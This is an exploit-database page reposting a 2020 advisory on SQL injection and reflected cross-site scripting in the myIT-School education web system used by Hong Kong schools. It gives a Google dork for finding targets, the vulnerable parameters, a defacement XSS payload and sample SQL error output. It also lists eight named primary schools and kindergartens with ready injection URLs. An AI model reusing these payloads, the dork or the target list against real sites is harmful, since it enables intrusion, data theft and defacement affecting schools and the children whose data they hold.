Advertisement






Powered by myIT-School Education System HongKong XSS SQL Injection

CVE Category Price Severity
CWE-89 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2020-01-20
CVSS EPSS EPSSP
Not specified 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020010147

Below is a copy:

Powered by myIT-School Education System HongKong XSS SQL Injection
###################################################################

# Exploit Title : Powered by myIT-School Education System HongKong XSS SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/01/2020
# Vendor Homepage : myit-school.net - myid.com.hk
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:/it-school/php/webcms/public/ site:edu.hk
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-79 [ Improper Neutralization of Input During 
Web Page Generation ('Cross-site Scripting') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
Powered by myIT-School Education System HongKong is prone to an SQL-injection 
vulnerability because it fails to sufficiently sanitize user-supplied data before using 
it in an SQL query. Exploiting this issue could allow an attacker to compromise the 
application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
A remote attacker can send a specially crafted request to the vulnerable application and 
execute arbitrary SQL commands in application`s database. Further exploitation of this 
vulnerability may result in unauthorized data manipulation. 
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

Reflected XSS (or Non-Persistent) :
***************************************
The server reads data directly from the HTTP request and reflects it back in the HTTP response. 
Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content
to a vulnerable web application, which is then reflected back to the victim and executed by the 
web browser. The most common mechanism for delivering malicious content is to include 
it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. 
URLs constructed in this manner constitute the core of many phishing schemes, whereby 
an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects 
the attacker's content back to the victim,the content is executed by the victim's browser.

###################################################################

# SQL Injection Exploit :
**********************
/it-school/php/webcms/public/mainpage/tpl.php?menuid=[SQL Injection]

/it-school/php/webcms/public/mainpage/albumindex.php?refid=[SQL Injection]

# Cross Site Scripting XSS Exploit :
********************************
/it-school/php/webcms/public/mainpage/albumindex.php?refid=1%27<marquee>
<font%20color=lime%20size=32>Hacked.By.KingSkrupellos.</font></marquee>

###################################################################

# Example Vulnerable Sites :
*************************
Tin Shui Wai Catholic Primary School

[+] tswcps.edu.hk/it-school/php/webcms/public/mainpage/albumindex.php?refid=1%27

Tsung Tsin Primary School and Kindergarten

[+] ttpskg.edu.hk/it-school/php/webcms/public/mainpage/tpl.php?menuid=1%27

Tung Tak School

[+] ttsch.edu.hk/it-school/php/webcms/public/mainpage/tpl.php?menuid=1%27

Jordan Road Government Primary School

[+] jrgps.edu.hk/it-school/php/webcms/public/mainpage/tpl.php?menuid=1%27

Sacred Heart Canossian School

[+] shcs.edu.hk/it-school/php/webcms/public/mainpage/tpl.php?menuid=1%27

Lok Sin Tong Lau Tak Primary School

[+] lautak.edu.hk/it-school/php/webcms/public/mainpage/tpl.php?menuid=1%27

St Stephen's Church KindergartenNursery

[+] ssck.edu.hk/it-school/php/webcms/public/mainpage/tpl.php?menuid=1%27

Munsang College Primary School

[+] kindergarten.munsang.edu.hk/it-school/php/webcms/public/mainpage/tpl.php?menuid=1%27

###################################################################

# Example SQL Database Error :
****************************
Database error: Invalid SQL: select * from webcms_item_component where refid= and component_id=1
Database error: Invalid SQL: select * from webcms_remarks where type='album_1''
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near 'and component_id=1' at line 1)
Session halted.

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.